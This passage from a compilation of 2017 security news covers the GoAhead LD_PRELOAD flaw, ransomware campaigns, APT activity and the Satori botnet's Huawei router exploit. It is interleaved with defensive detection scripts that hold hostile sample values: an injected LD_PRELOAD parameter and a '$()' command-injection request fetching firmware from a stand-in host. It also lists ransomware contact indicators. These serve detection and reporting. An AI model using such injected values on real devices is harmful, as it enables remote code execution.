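    params = parse_query("lang=en&LD_PRELOAD=/tmp/x.so")
    print("vulnerable:", build_env_vulnerable({"PATH": "/usr/bin"}, params))
    print("hardened:  ", build_env_hardened({"PATH": "/usr/bin"}, params))
    print("log hits:  ", suspicious_cgi_requests(SAMPLE_LOG))
```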

Elttam reported the vulnerability to Embedthis, the company that develops the web server, which promptly released an update that addresses the flaw.

Now it is important that hardware manufacturers include the patch in the GoAhead instances running in their products, but this process could take a long time.

To get an idea of the impact of the flaw, it is possible to query the Shodan search engine: between 500,000 and 700,000 devices could be affected.



❄️🎄3ncr1ptmas🎄❄️
@3ncr1pt3d
CVE-2017-17562: Remote LD_PRELOAD exploitation of GoAhead web server.
So this runs a hell of a lot of things: printers, network gear, CC cameras. Users of telecoms hosting stuff. Convenience without proper configuration.

What I found on Shodan now:

6:07 AM - Dec 19, 2017
Elttam also released proof-of-concept code that can be used to test whether IoT devices are vulnerable to CVE-2017-17562.

Such flaws are exploited by IoT malware like BrickerBot, Mirai, Hajime, and Persirai.

In March, the researcher Pierre Kim revealed that more than 185,000 vulnerable Wi-Fi-connected cameras were exposed to the Internet due to a flaw in the GoAhead server.


Schneider Electric Patches Flaws in Pelco VideoXpert Enterprise product
26.12.2017 securityaffairs
Vulnerability

Schneider Electric recently released a firmware update for its Pelco VideoXpert Enterprise product that addresses several vulnerabilities, including a high severity code execution flaw, tracked as CVE-2017-9966.
The Pelco VideoXpert solution is widely used in commercial facilities worldwide.

The security researcher Gjoko Krstic found two directory traversal bugs and an improper access control flaw that can be exploited by an attacker to achieve arbitrary code execution.

Both Schneider Electric and ICS-CERT published security advisories about CVE-2017-9966, which could be exploited by an attacker to replace certain files and execute malicious code with system privileges.

“By replacing certain files, an authorized user can obtain system privileges and the inserted code would execute at an elevated privilege level.

CVE-2017-9966 has been assigned to this vulnerability. A CVSS v3 base score of 7.1 has been calculated;” reads the ICS-CERT advisory.

“Successful exploitation of these vulnerabilities may allow an authorized user to gain system privileges or an unauthorized user to view files.”


Both directory traversal vulnerabilities (tracked as CVE-2017-9964 and CVE-2017-9965) have been classified as medium severity. The first flaw could be exploited by an attacker to bypass authentication or hijack sessions by “sniffing communications.”

The second directory traversal vulnerability can be exploited by an unauthorized user to access web server files that could contain sensitive information.

These Pelco VideoXpert Enterprise vulnerabilities have been patched with the release of firmware version 2.1. All prior versions are affected.


Experts from Bleeping Computer spotted a new Cryptomix Ransomware variant
25.12.2017 securityaffairs
Ransomware

Security experts spotted a new variant of the CryptoMix ransomware that uses a different extension (.FILE) and a new set of contact emails.
Security experts from BleepingComputer discovered a new variant of the CryptoMix ransomware that appends a different extension (.FILE) to the names of encrypted files and uses new contact emails.

For example, a file encrypted by this variant of ransomware has an encrypted file name of 0D0A516824060636C21EC8BC280FEA12.FILE.

Experts discovered that this variant uses the same encryption methods as previous ones and the ransom note is still named _HELP_INSTRUCTION.TXT, but the contact emails for receiving payment instructions are file1@keemail.me, file1@protonmail.com, file1m@yandex.com, file1n@yandex.com, and file1@techie.com.


Further details and the IoCs are included in the post published on Bleeping Computer.

“As we are always looking for weaknesses, if you are a victim of this variant and decide to pay the ransom, please send us the decryptor so we can take a look at it. You can also discuss or receive support for Cryptomix ransomware infections in our dedicated Cryptomix Help & Support Topic.” wrote Lawrence Abrams.

Below is the list of recommendations provided by the experts to protect your system from ransomware attacks.

Backup, Backup, Backup!
Do not open attachments if you do not know who sent them.
Do not open attachments until you confirm that the person actually sent you them.
Enable the showing of file extensions.
If an attachment ends with .js, .vbs, .exe, .scr, or .bat, do not open them for any reason.
Scan attachments with tools like VirusTotal.
Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors. Therefore it is important to keep them updated.
Make sure you have some sort of security software installed that uses behavioral detections or white list technology. White listing can be a pain to train, but if you're willing to stick with it, it could have the biggest payoffs.
Use hard passwords and never reuse the same password at multiple sites.
If you are interested in the Indicators of Compromise, take a look at the blog post.


Financially motivated attacks reveal the interests of the Lazarus APT Group
25.12.2017 securityaffairs APT

Researchers at security firm Proofpoint collected evidence of the significant interest of the Lazarus APT group in cryptocurrencies; the group’s arsenal of tools, implants, and exploits is extensive and under constant development.
Researchers at security firm Proofpoint collected evidence of the significant interest of the Lazarus APT group in cryptocurrencies. The North Korea-linked hackers launched several multistage attacks that use cryptocurrency-related lures to infect victims with malware.

The malicious code aims to steal credentials for cryptocurrency wallets and exchanges, but there is much more.

“Proofpoint researchers have uncovered a number of multistage attacks that use cryptocurrency-related lures to infect victims with sophisticated backdoors and reconnaissance malware that we attribute to the Lazarus Group.” reads the analysis published by Proofpoint. “Victims of interest are then infected with additional malware including Gh0st RAT to steal credentials for cryptocurrency wallets and exchanges, enabling the Lazarus Group to conduct lucrative operations stealing Bitcoin and other cryptocurrencies.”

The Lazarus APT group has increasingly focused on financially motivated attacks in an attempt to exploit the media interest in the skyrocketing prices of cryptocurrencies.

The activity of the Lazarus Group surged in 2014 and 2015; its members mostly used custom-tailored malware in their attacks, and experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers discovered that the North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Pictures hack.

Lazarus is believed to be the first nation-state attacker targeting point-of-sale systems with a framework to steal payment card data.

The timing is perfect: the hackers are intensifying their operations around the Christmas shopping season.

The arsenal of the Lazarus APT group includes sophisticated custom-made malware, DDoS botnets, and wiper malware.

The research paper published by the experts details a new implant dubbed PowerRatankba, a PowerShell-based malware variant that closely resembles the original Ratankba implant.

Experts also documented a new and emerging threat dubbed RatankbaPOS that targets point-of-sale systems.


“The Lazarus Group is a sophisticated, state-sponsored APT group with a long history of successful destructive, disruptive, and costly attacks on worldwide targets. State-sponsored groups are generally focused on espionage and disruption. However, our findings on their recent activities relate to the financially motivated arm of Lazarus, the operations of which are peculiar to the North Korean group.” said Patrick Wheeler, director of threat intelligence, Proofpoint.

“These actions, including the targeting of cryptocurrency exchange credentials and point-of-sale infrastructure, are significant for a number of reasons:

This appears to be the first publicly documented instance of a state-sponsored actor attacking point-of-sale infrastructure for financial gain.

Cryptocurrencies are nothing new to threat actors, state-sponsored or otherwise. However, in this case we were able to extensively document the custom-built tools and procedures that Lazarus group is using to perform cryptocurrency theft.

This group now appears to be targeting individuals rather than just organisations: individuals are softer targets, often lacking resources and knowledge to defend themselves and providing new avenues of monetisation for a state-sponsored threat actor’s toolkit. Bringing the tools and resources of a state-sponsored attack group to bear against individuals and infrastructure used by large numbers of private citizens raises the stakes considerably when assessing potential impact.

We were able to differentiate the actions of the financially motivated team within Lazarus from those of their espionage and disruption groups that have recently grabbed headlines, providing better insight into their operations and the worldwide threat represented by Lazarus.”


Facebook’s photo tagging system now looks for users in photos they’re not tagged in
24.12.2017 securityaffairs
Social

Facebook is rolling out a new feature for its photo tagging mechanism; it now looks for users in photos they’re not tagged in.
Facebook is rolling out a new feature for its photo tagging mechanism that will now scan newly uploaded photos and alert all the users it recognizes in that photo. The feature aims to detect if others might be attempting to abuse your image.

“Powered by the same technology we’ve used to suggest friends you may want to tag in photos or videos, these new features help you find photos that you’re not tagged in and help you detect when others might be attempting to use your image as their profile picture,” explained Joaquin Quiñonero Candela, Director, Applied Machine Learning at Facebook.

The photo tagging system analyzes every image Facebook users upload, scanning for human faces; it then associates each face with a template composed of a string of numbers computed by the platform.

The photo tagging system compares the templates of the faces found in any newly uploaded image with the face templates of other Facebook users and, on a match, sends those users a notification.


“Now, if you’re in a photo and are part of the audience for that post, we’ll notify you, even if you haven’t been tagged. You’re in control of your image on Facebook and can make choices such as whether to tag yourself, leave yourself untagged, or reach out to the person who posted the photo if you have concerns about it.” added Candela.

The new feature aims to curb any abuse of the social media platform.

Facebook also announced new tools for people with visual impairments: the platform will detect people not tagged in an image and tell the user who is in the photo.

The updates to the photo tagging mechanism will not roll out in Canada and the EU due to local user privacy laws.

Users who do not want to receive notifications when others upload photos of them can disable photo tagging notifications.


Russian Fancy Bear APT Group improves its weapons in ongoing campaigns
24.12.2017 securityaffairs APT

Fancy Bear APT group refactored its backdoor and improved encryption to make it stealthier and harder to stop.
The operations conducted by the Russian Fancy Bear APT group (aka Sednit, APT28, Sofacy, Pawn Storm, and Strontium) are even more sophisticated and hard to detect due to.
According to a new report published by experts from security firm ESET, the APT group recently refurbished one of its most popular backdoors, Xagent, significantly improving it with new functionality that makes it stealthier and harder to stop.
The vxers have redesigned the architecture of the malware, so previously discovered infection patterns have become harder to recognize.
The X-Agent backdoor (aka Sofacy) has been associated with several espionage campaigns attributed to Fancy Bear. Over the years, experts have observed several strains of X-Agent specifically designed to compromise Windows, Linux, iOS and Android, and in early 2017 researchers at Bitdefender spotted the first version of X-Agent developed to compromise macOS systems.

The latest version of the X-Agent backdoor, the fourth one, implements new techniques for obfuscating strings and all run-time type information. Cyberspies upgraded some of the code used for C&C purposes and added a new domain generation algorithm (DGA) feature in the WinHttp channel for quickly creating fallback C&C domains.

ESET observed a significant improvement in the encryption algorithm and DGA implementation that makes domain takeover more difficult.

Fancy Bear also implemented internal improvements, including new commands that can be used for hiding malware configuration data and other data on an infected system.

The attack chain remained largely unchanged; the APT group Fancy Bear still relies heavily on “very cleverly crafted phishing emails.”

“The attack usually starts with an email containing either a malicious link or malicious attachment. We have seen a shift in the methods they use ‘in the course of the year’, though. Sedkit was their preferred attack vector in the past, but that exploit kit has completely disappeared since late 2016.” reads the report published by ESET. “The DealersChoice exploit platform has been their preferred method since the publication of our white paper, but we saw other methods being used by this group, such as macros or the use of Microsoft Word Dynamic Data Exchange.”


The group stopped using the Sedkit exploit kit and has increasingly turned to a platform called DealersChoice, a Flash exploit framework the group also used against Montenegro.

DealersChoice generates documents with embedded Adobe Flash Player exploits based on the target’s configuration.

Fancy Bear’s operations are still focused on government departments and embassies all over the world.


Chinese authorities have sentenced a man to 5 years in prison for selling a VPN service without the authorization
24.12.2017 securityaffairs BigBrothers

The Chinese authorities have sentenced a man to five-and-a-half years in prison for selling a VPN service without the authorization.
China continues to intensify its monitoring of cyberspace; the authorities fight any service that could be used to bypass the censorship system known as the Great Firewall.

The Great Firewall already blocks access to hundreds of the world’s top 1,000 websites, including Google, Facebook, Twitter, and Dropbox.

Since early this year, the Chinese authorities have been banning “unauthorized” VPN services; any company offering this type of service in the country must obtain a license from the government.

Residents of the country use VPN and proxy services to bypass the censorship implemented by the Great Firewall and access websites prohibited by the government without revealing their identity.

A Chinese court in the southern region of Guangxi sentenced Wu Xiangyang, a Chinese citizen from the Guangxi Zhuang autonomous region, for offering an unlicensed VPN service from 2013 until June 2017.

According to an announcement from China’s Procuratorate Daily on Wednesday, the man was also fined 500,000 yuan ($76,000).

“From 2013 to June 2017, Wu Xiangyang, the suspect Wu Xiang Yang, illegally profited without obtaining the relevant business license, set up his own VPN server on the Internet and provided a member account and login software which allows him to browse foreign websites;” states the announcement.

“In addition the suspect Wu Xiangyang also some VPN member account password written to the hardware router, making the modified router can log in directly to the VPN, to achieve the ability to listen to foreign websites audio and video programs.”

Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Wu Xiangyang set up his “Where Dog VPN” website on a shop created on the shopping site “Taobao” and advertised it on social media sites.

It was a successful business for the Chinese man: in March 2016 the company claimed on Twitter to have 8,000 foreigners and 5,000 businesses using the VPN service to bypass censorship in the country.

In July, in compliance with the Chinese Internet monitoring law, Apple started removing all iOS VPN apps from its App Store in China.


Experts uncovered a new GlobeImposter Ransomware malspam campaign
24.12.2017 securityaffairs
Ransomware

Experts observed cybercriminals conducting a new malspam campaign to distribute a new variant of the GlobeImposter ransomware.
According to Lawrence Abrams from BleepingComputer, crooks are conducting a new malspam campaign to distribute a new variant of the GlobeImposter ransomware that appends the “..doc” extension to encrypted files.

The malicious messages pretend to have attached photos being sent to the recipient and have a subject line similar to “Emailing: IMG_20171221_”.


The messages include 7zip (.7z) archive attachments named like camera photos, such as IMG_[date]_[number]. The archive contains an obfuscated .js file; when a victim double-clicks it, it downloads the GlobeImposter ransomware from a remote server and executes it.

“After the executable is downloaded, it will be executed and the GlobeImposter ransomware will begin to encrypt the computer. When encrypting files on the computer it will append the ..doc extension to encrypted file’s name. For example, a file called 1.doc would be renamed to 1.doc..doc.” states the analysis published by Abrams.

Once the files are encrypted, GlobeImposter creates a ransom note named Read___ME.html in each folder where a file was encrypted. Victims are instructed to visit the http://n224ezvhg4sgyamb.onion/sup.php onion site, which provides an email address to contact (server5@mailfence.com) to receive payment instructions and to decrypt one file for free. The note also includes a link to a support website that victims can use to send messages to the criminals.

Lawrence confirmed that files encrypted by the GlobeImposter ransomware cannot be decrypted for free.
Below is the list of recommendations provided by the experts to protect your system from ransomware attacks.

Backup, Backup, Backup!
Do not open attachments if you do not know who sent them.
Do not open attachments until you confirm that the person actually sent them to you.
Enable the showing of file extensions.
If an attachment ends with .js, .vbs, .exe, .scr, or .bat, do not open it for any reason.
Scan attachments with tools like VirusTotal.
Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. Older programs contain security vulnerabilities that are commonly exploited by malware distributors, so it is important to keep them updated.
Make sure you have some sort of security software installed that uses behavioral detection or whitelisting technology. Whitelisting can be a pain to train, but if you're willing to stick with it, it can have the biggest payoff.
Use strong passwords and never reuse the same password at multiple sites.
If you are interested in the Indicators of Compromise, take a look at the original blog post.
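The two observable traits of this campaign described above (a photo-lookalike .7z attachment carrying a .js script, and the "..doc" rename plus Read___ME.html note on the host) can be turned into simple checks. The following is an added example, not code from BleepingComputer or the original post; the attachment names, archive listings and file paths it runs on are constructed for the demo, and the archive listing is assumed to come from a separate unpacking step that is not shown.

```python
"""Added example: mail-gateway and host checks for the GlobeImposter malspam
traits described in the article. All sample data is constructed."""
import os
import re

# Attachment extensions that should never be opened from mail (per the advice above).
SCRIPT_EXTENSIONS = {".js", ".vbs", ".exe", ".scr", ".bat"}

# Attachment names that imitate a camera photo, e.g. IMG_20171221_1234.7z
PHOTO_ARCHIVE_RE = re.compile(r"^IMG_\d{8}_\d+\.7z$", re.IGNORECASE)

RANSOM_NOTE = "Read___ME.html"
ENCRYPTED_MARKER = "..doc"   # appended to every encrypted file name


def risky_attachment(subject, attachment, members):
    """Return the reasons a message looks like this campaign (empty list if none).

    `members` is the list of file names inside the archive, assumed to come from
    an archive-listing step performed elsewhere.
    """
    reasons = []
    if subject.startswith("Emailing: IMG_") and PHOTO_ARCHIVE_RE.match(attachment):
        reasons.append("photo-lookalike .7z attachment with 'Emailing:' subject")
    for name in members:
        ext = os.path.splitext(name)[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"script/executable inside archive: {name}")
    return reasons


def find_encrypted_files(paths):
    """Given file paths from a host, return those renamed with the '..doc'
    marker this variant appends, plus any ransom notes it drops."""
    hits = []
    for path in paths:
        name = path.replace("\\", "/").rsplit("/", 1)[-1]
        if name.endswith(ENCRYPTED_MARKER) or name == RANSOM_NOTE:
            hits.append(path)
    return hits


if __name__ == "__main__":
    # Constructed message resembling the campaign.
    print(risky_attachment("Emailing: IMG_20171221_1234",
                           "IMG_20171221_1234.7z",
                           ["IMG_20171221_1234.js"]))
    # Constructed host listing after an infection.
    print(find_encrypted_files([r"C:\Users\a\Documents\1.doc..doc",
                                r"C:\Users\a\Documents\Read___ME.html",
                                r"C:\Users\a\Documents\notes.txt"]))
```

The attachment check deliberately keys on the archive's contents rather than only its name: a benign photo archive would contain image files, not a .js script.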


US Intel Chiefs Sound Alarm on Overseas Web Spying Law
23.12.2017 securityweek BigBrothers
US intelligence chiefs on Thursday sounded the alarm about the imminent expiration of a law that allows them to spy on overseas web users, and called on Congress to renew it immediately.

"If Congress fails to reauthorize this authority, the Intelligence Community will lose valuable foreign intelligence information, and the resulting intelligence gaps will make it easier for terrorists, weapons proliferators, malicious cyber actors, and other foreign adversaries to plan attacks against our citizens and allies without detection," the intelligence chiefs said in an open letter to Congress.

The letter was signed by Director of National Intelligence Dan Coats, CIA Director Mike Pompeo, Attorney General Jeff Sessions, FBI chief Christopher Wray and the director of the National Security Agency (NSA) Michael Rogers.

The law they want extended, known as Article 702 of the Foreign Intelligence Surveillance Act (FISA), is set to expire at the end of the year, and Congress is preparing a temporary extension until January 19 as part of a short-term budget bill which will fund the federal government.

The House of Representatives was due to vote on the budget later Thursday, with a deadline to pass it by midnight Friday. The Senate will vote on it after that.

The law allows US intel agencies to spy on internet users abroad, including on platforms like Facebook and Skype. Congress initially passed the law in 2008 and renewed it in 2012, for five years.

"Short-term extensions are not the long-term answer either, as they fail to provide certainty, and will create needless and wasteful operational complications," said the intelligence heads in their statement.

Most members of Congress support renewing the law on the grounds of combating terrorism, but some on the far right and left have joined forces to try to restrict it, citing concerns that US citizens could be caught up in the overseas spying program.

By law, communications by US citizens cannot be legally intercepted and used except with a judge's warrant, unlike foreigners living overseas who do not benefit from the same constitutional protections as Americans.


Mirai Variant "Satori" Targets Huawei Routers
23.12.2017 securityweek BotNet
Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router that stems from the TR-064 technical report standard, designed and intended for local network configuration, being exposed to the WAN through port 37215 (UPnP, Universal Plug and Play).

The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.

By successfully exploiting the flaw, an attacker could download and execute a malicious payload onto the impacted devices. In this case, the payload was the Satori botnet, Check Point notes.

Huawei was informed of the vulnerability on November 27. Within days, the company published an advisory confirming the vulnerability and informing users of available measures to circumvent or prevent the exploit: using the built-in firewall function, changing default passwords, and deploying a firewall on the carrier side.

“The customers can deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade the IPS signature database to the latest version IPS_H20011000_2017120100 released on December 1, 2017 to detect and defend against this vulnerability exploits initiated from the Internet.” Huawei notes.

In this Satori attack, each bot is used to flood targets with manually crafted UDP or TCP packets. The bot first attempts to resolve the IP address of a command and control (C&C) server using a DNS request with a hardcoded domain name, then takes the addresses from the DNS response and tries to connect via TCP on the hardcoded target port (7645).

The C&C server provides the number of packets used for the flooding action and their corresponding parameters, and can also pass an individual IP for attack or a subnet.

The bot’s binary, the researchers discovered, contains a lot of unused text strings, supposedly inherited from another bot or a previous version.

A custom protocol is used for C&C communication, which includes two hardcoded requests to check in with the server, which in turn responds with the parameters for launching distributed denial of service attacks.

While analyzing the incident, which involved the use of a zero-day and numerous servers to attack Huawei devices, the security researchers discovered that the actor behind the Satori botnet might be using the online handle of NexusZeta.

They were able to track the actor’s activity across several hacking forums and also discovered that NexusZeta is active on social media, most notably Twitter and Github, and has Skype and SoundCloud accounts under the name of Caleb Wilson (caleb.wilson37 / Caleb Wilson 37), but couldn’t determine if this is the attacker's real name.

Based on forum posts attributed to the actor, the researchers concluded that he isn’t an advanced actor, “but rather an amateur with lots of motivation, looking for the crowd’s wisdom.” What the security researchers couldn’t determine, however, was how the zero-day vulnerability arrived in the individual’s possession.

“Nonetheless, as seen in this case as well as others over the past year, it is clear that a combination of leaked malware code together with exploitable and poor IoT security, when used by unskilled hackers, can lead to disastrous results,” Check Point concludes.


Digmine Cryptocurrency Miner spreads via Facebook messenger
23.12.2017 securityaffairs
Social

Researchers from security firm Trend Micro observed crooks spreading a new cryptocurrency mining bot dubbed Digmine via Facebook Messenger.
Watch out for video files (packed in a zip archive) sent by your friends via Facebook Messenger: according to researchers from security firm Trend Micro, crooks are using this technique to spread a new cryptocurrency mining bot dubbed Digmine.

The bot was first observed in South Korea; the experts named it Digmine after the moniker (비트코인 채굴기 bot) used in a report on recent related incidents in South Korea. Digmine infections were also observed in other countries such as Vietnam, Azerbaijan, Ukraine, the Philippines, Thailand, and Venezuela.

Attackers are targeting Google Chrome desktop users to take advantage of the recent spike in the price of cryptocurrencies.

Digmine is a Monero-mining bot disguised as a non-embedded video file named video_xxxx.zip; the archive actually contains an AutoIt script.

The infection starts when the victim opens the file: the malicious code compromises the system and downloads its components and related configuration files from a command-and-control server.

Digmine first installs a miner (miner.exe, a modified version of the open-source Monero miner XMRig) that silently mines the Monero cryptocurrency in the background. The bot also installs an autostart mechanism and launches Chrome with a malicious extension that allows the attackers to control the victim's Facebook profile and use it to spread the malware to the victim's Messenger friends list.

“Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger’s desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended.” reads the analysis published by TrendMicro.

“Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user’s Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account’s friends.”

Researchers observed that, since Chrome extensions can only be installed via the official Chrome Web Store, the crooks launch Chrome (loaded with the malicious extension) via the command line.

“The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video” Trend Micro continues.

“The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware’s components.”


The technique doesn’t work when users open the malicious video file through the Messenger app on their mobile devices.

“The abuse of Facebook is limited to propagation for now, but it wouldn’t be implausible for attackers to hijack the Facebook account itself down the line. This functionality’s code is pushed from the command-and-control (C&C) server, which means it can be updated.” continues the analysis.

Facebook had taken down most of the malware files from the social networking site.

Further info, including the IoCs, is included in the report.
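Two of the traits above are easy to check for on an endpoint: a "video" archive whose member is really a Windows executable (AutoIt compiles to a PE file), and a Chrome process started from the command line with a side-loaded extension. The following is an added example, not Trend Micro's code or anything from the report; the zip archive and process command line it inspects are constructed for the demo, and it assumes the extension is side-loaded with Chrome's `--load-extension` switch (the article says only "via command line", so the exact switch is an assumption).

```python
"""Added example: endpoint checks for the two Digmine traits described above.
The archive and the process command line are constructed; no real malware
content is embedded."""
import io
import os
import re
import zipfile

# Extensions that should never appear inside a 'video' archive.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".bat", ".cmd", ".js", ".vbs"}
PE_MAGIC = b"MZ"   # every Windows executable, AutoIt-compiled scripts included, starts with this


def suspicious_zip_members(zip_bytes):
    """Inspect every member of a zip archive and report executables, both by
    extension and by content (PE magic), regardless of the file name."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            ext = os.path.splitext(info.filename)[1].lower()
            if ext in EXECUTABLE_EXTENSIONS:
                findings.append(f"{info.filename}: executable extension {ext}")
            with archive.open(info) as member:
                if member.read(2) == PE_MAGIC:
                    findings.append(f"{info.filename}: content starts with PE header (MZ)")
    return findings


def chrome_sideloaded_extension(cmdline):
    """True when a chrome.exe process was started with --load-extension
    (assumed mechanism for loading an extension outside the Web Store)."""
    is_chrome = re.search(r'chrome\.exe"?(\s|$)', cmdline, re.IGNORECASE) is not None
    return is_chrome and "--load-extension=" in cmdline.lower()


def build_sample_zip():
    """Constructed stand-in for a 'video_xxxx.zip' lure: a PE-looking stub
    named like the AutoIt dropper, plus a harmless text file."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w") as archive:
        archive.writestr("video_1234.exe", PE_MAGIC + b"\0" * 62 + b"(constructed stub, not a real binary)")
        archive.writestr("readme.txt", b"just text")
    return mem.getvalue()


if __name__ == "__main__":
    print(suspicious_zip_members(build_sample_zip()))
    # Constructed process-creation record.
    print(chrome_sideloaded_extension(
        r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=C:\Users\u\AppData\Local\Temp\ext'))
```

Checking the PE magic rather than only the extension matters because a lure can carry a doubled or misleading extension; the content check catches the executable either way.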


Satori is the latest Mirai botnet variant that is targeting Huawei HG532 home routers
23.12.2017 securityaffairs BotNet

Satori botnet, Mirai variant, is responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.
The Mirai botnet makes the headlines once again: a new variant dubbed Satori is responsible for hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers.

The activity of the Satori botnet has been observed over the past month by researchers from Check Point security.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point security.
Satori is an updated variant of the notorious Mirai botnet, which was first spotted by the malware researchers MalwareMustDie in August 2016. The malicious code was developed to target IoT devices; the Satori version targets port 37215 on Huawei HG532 devices.

The attacks against Huawei HG532 devices were observed in several countries, including the USA, Italy, Germany, and Egypt.


Experts observed that the attacks attempt to exploit the CVE-2017-17215 zero-day vulnerability in the Huawei home router, which stems from the TR-064 technical report standard, designed for local network configuration, being exposed to the WAN through port 37215 (UPnP – Universal Plug and Play).

“In this case though, the TR-064 implementation in the Huawei devices was exposed to WAN through port 37215 (UPnP).

From looking into the UPnP description of the device, it can be seen that it supports a service type named `DeviceUpgrade`. This service is supposedly carrying out a firmware upgrade action by sending a request to “/ctrlt/DeviceUpgrade_1” (referred to as controlURL ) and is carried out with two elements named `NewStatusURL` and `NewDownloadURL`.” continues the analysis.

“The vulnerability allows remote administrators to execute arbitrary commands by injecting shell meta-characters “$()” in the NewStatusURL and NewDownloadURL”


The successful exploitation of the vulnerability could allow an attacker to download and execute the Satori bot.

The flaw was reported to Huawei on November 27; a few days later, the company published a security advisory that notifies users of the vulnerability and provides recommendations to prevent its exploitation.

Customers can take the following measures to circumvent or prevent the exploit of this vulnerability. For details, consult the local service provider or Huawei TAC.

Configure the built-in firewall function.
Change the default password.
Deploy a firewall at the carrier side.
“The customers can deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade the IPS signature database to the latest version IPS_H20011000_2017120100 released on December 1, 2017 to detect and defend against this vulnerability exploits initiated from the Internet.” reads the advisory published by Huawei.

Each Satori bot floods targets with manually crafted UDP or TCP packets. The bot first attempts to resolve the IP address of a C&C server using a DNS request with a hardcoded domain name, then takes the addresses from the DNS response and tries to connect via TCP on the hardcoded target port (7645).

The C&C server, in turn, provides the number of packets used for the flooding action and their corresponding parameters, and can also pass an individual IP for attack or a subnet.

The bot uses a custom protocol to communicate with the C&C; it includes two hardcoded requests to check in with the server, which responds with the DDoS attack parameters.

The researchers that investigated the case determined that the actor behind the Satori botnet might be using the online handle of NexusZeta.

NexusZeta is very active on social media such as Twitter and Github, and has Skype and SoundCloud accounts under the name of Caleb Wilson (caleb.wilson37 / Caleb Wilson 37).

While the actor described himself as a novice (“an amateur with lots of motivation, looking for the crowd’s wisdom.”), it is unclear how he obtained the zero-day vulnerability.

“Nonetheless, as seen in this case as well as others over the past year, it is clear that a combination of leaked malware code together with exploitable and poor IoT security, when used by unskilled hackers, can lead to disastrous results,” Check Point concludes.
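Both Satori write-ups above describe two stages a defender can observe on the wire: an inbound request to the DeviceUpgrade controlURL on port 37215 whose NewStatusURL or NewDownloadURL element carries "$()" command substitution, and an infected device's outbound TCP connection to the hardcoded C&C port 7645. The following detector is an added example, not Check Point's or Huawei's code; the HTTP request and the flow records it runs on are constructed for the demo (the injected value is a labelled placeholder, not real exploit content), and the field order of the flow records is an assumption.

```python
"""Added example: detection logic for the two Satori stages described above,
run over a constructed HTTP request and constructed flow records."""
import re

UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"          # controlURL named in the analysis
ELEMENT_RE = re.compile(r"<(NewStatusURL|NewDownloadURL)>(.*?)</\1>", re.S)
# Command substitution has no place in a URL element; "$(" is the form named in the advisory.
SHELL_META = ("$(", "`")
C2_PORT = "7645"                                  # hardcoded C&C port from the analysis


def inspect_upgrade_request(raw_http):
    """Return findings for one HTTP request delivered to TCP/37215.

    Only requests to the DeviceUpgrade controlURL are examined; for those, each
    NewStatusURL / NewDownloadURL element is checked for shell metacharacters.
    """
    findings = []
    head, _, body = raw_http.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    if UPGRADE_PATH not in request_line:
        return findings
    for element, value in ELEMENT_RE.findall(body):
        bad = [m for m in SHELL_META if m in value]
        if bad:
            findings.append(f"{element} contains shell metacharacters {bad}: {value!r}")
    return findings


def flag_satori_c2_flows(flow_lines):
    """flow_lines: constructed 'src_ip src_port dst_ip dst_port proto' records.
    Return the source IPs that opened TCP connections to the C&C port."""
    suspects = set()
    for line in flow_lines:
        src, _sport, _dst, dport, proto = line.split()
        if proto.upper() == "TCP" and dport == C2_PORT:
            suspects.add(src)
    return sorted(suspects)


# Constructed request: shape follows the analysis; "$(placeholder)" stands in for the injected command.
SAMPLE_MALICIOUS = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Host: 192.0.2.10:37215\r\n"
    "Content-Type: text/xml\r\n\r\n"
    "<NewStatusURL>$(placeholder)</NewStatusURL>"
    "<NewDownloadURL>http://192.0.2.99/fw.bin</NewDownloadURL>"
)
SAMPLE_BENIGN = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Host: 192.0.2.10:37215\r\n\r\n"
    "<NewStatusURL>http://192.0.2.20/status</NewStatusURL>"
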